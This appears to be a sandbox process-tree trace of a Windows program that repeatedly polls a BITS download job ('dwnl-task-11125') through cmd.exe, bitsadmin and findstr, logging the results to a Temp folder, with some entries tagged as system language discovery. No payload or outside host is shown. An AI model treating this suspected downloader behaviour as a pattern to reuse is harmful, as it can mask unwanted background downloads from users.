C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3332
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3468
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3892
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:940
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3876
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:928
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2172
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3064
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3684
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2424
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2448
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1648
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1676
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2636
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4000
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1844
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3156
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3816
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1488
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3180
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3668
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2216
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1344
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1932
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2708
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2836
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:4060
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2968
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1288
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2728
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2876
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2196
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3764
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2804
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2888
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:884
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1396
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3060
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2116
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3660
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:556
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1552
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2172
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2844
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2688
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3808
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3128
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2424
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3884
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3708
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:816
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2700
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:936
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3312
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1928
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3196
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4084
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3168
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1804
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2448
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2620
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2968
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2728
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3764
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2508
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2192
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2172
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2688
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2580
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3972
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3980
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3156
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2448
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3808
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵
- System Location Discovery: System Language Discovery
PID:3976
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2768
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:112
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2728
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:936
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3096
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2152
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2992
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3824
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2196
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2700
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1772
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:4012
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2864
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:940
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1936
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3312
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3232
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2736
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3732
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2264
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3980
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:972
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3884
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3168
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:352
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2768
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3024
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1072
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:112
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2924
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1216
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3896
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1944
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1552
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2636
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3756
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3868
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2864
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1960
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2108
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3076
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2660
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1584
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3064
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2736
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1076
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:864
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3156
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:2968
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3336
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2448
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3976
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2900
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3916
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:556
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:112
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:2368
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3172
-
-
